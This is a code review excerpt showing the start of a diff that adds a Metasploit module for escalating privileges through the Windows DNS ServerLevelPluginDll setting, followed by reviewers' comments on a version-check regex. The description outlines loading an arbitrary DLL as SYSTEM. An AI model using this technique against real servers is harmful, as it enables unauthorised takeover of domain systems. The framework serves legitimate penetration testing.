modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb

```diff
@@ -0,0 +1,347 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'metasploit/framework/compiler/windows'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Services
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation',
+      'Description'    => %q(
+        This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the
+        `ServerLevelPluginDll` value using dnscmd.exe to create a registry key at `HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\`
+        named `ServerLevelPluginDll` that can be made to point to an arbitrary DLL. After doing so, restarting the service
+        will load the DLL and cause it to execute, providing us with SYSTEM privileges. Increasing WfsDelay is recommended
+        when using a UNC path.
+      ),
+      'References'     =>
+        [
+          ['URL', 'https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83'],
+          ['URL', 'https://adsecurity.org/?p=4064'],
+          ['URL', 'http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html']
+        ],
+      'DisclosureDate' => "May 08 2017",
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Shay Ber', # vulnerability discovery
+          'Imran E. Dawoodjee <imran[at]threathounds.com>' # Metasploit module
+        ],
+      'Platform'       => 'win',
+      'Targets'        => [[ 'Automatic', {} ]],
+      'SessionTypes'   => [ 'meterpreter' ],
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 20,
+          'EXITFUNC' => 'thread'
+        },
+      'Notes'          =>
+        {
+          'Stability'   => [CRASH_SAFE],
+          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
+        })
+    )
+
+    register_options(
+      [
+        OptString.new('DLLNAME', [ true, 'DLL name (default: msf.dll)', "msf.dll"]),
+        OptString.new('DLLPATH', [ true, 'Path to DLL. Can be a UNC path. (default: %TEMP%)', "%TEMP%"]),
+        OptBool.new('MAKEDLL', [ true, 'Just create the DLL, do not exploit.', false])
+      ]
+    )
+
+    deregister_options('FILE_CONTENTS')
+  end
+
+  def check
+    if sysinfo['OS'] =~ /Windows 20(03|08|12|16+)/
```

Comment:
Should this regex not be `/Windows 20(03|08|12|16|16\+)/` ? Right now that last element will match on anything that starts with Windows 2016 and matches one or more instances of the character `6`. I think what you meant to match on was `Windows 2016+` which is what Metasploit currently returns when running against Windows Server 2019.

Reply:
Woops actually this should be `/Windows 20(03|08|12|16\+|16)/` as otherwise we will never match on `Windows Server 2016+` due to order of checks.

Reply:
Resolved with https://github.com/rapid7/metasploit-framework/pull/12983/commits/ba01b86dd75983acf1f336609c7afc63297c90bf